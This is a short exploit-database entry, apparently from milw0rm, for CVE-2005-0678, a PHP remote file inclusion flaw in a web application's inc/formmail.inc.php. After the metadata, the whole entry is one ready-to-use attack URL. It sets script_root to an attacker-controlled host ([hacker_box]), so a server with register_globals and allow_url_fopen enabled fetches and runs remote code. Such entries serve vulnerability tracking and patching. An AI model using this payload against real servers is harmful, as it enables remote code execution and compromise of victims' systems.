Author: Filip Groszynski type: webapps platform: php port: date_added: 2005-03-04 date_updated: verified: 1 codes: OSVDB-14572;CVE-2005-0678 tags: aliases: screenshot_url: application_url:
Example: if register_globals=on and allow_url_fopen=on: http://[victim]/[dir]/inc/formmail.inc.php?script_root=http://[hacker_box]/ # milw0rm.com [2005-03-05]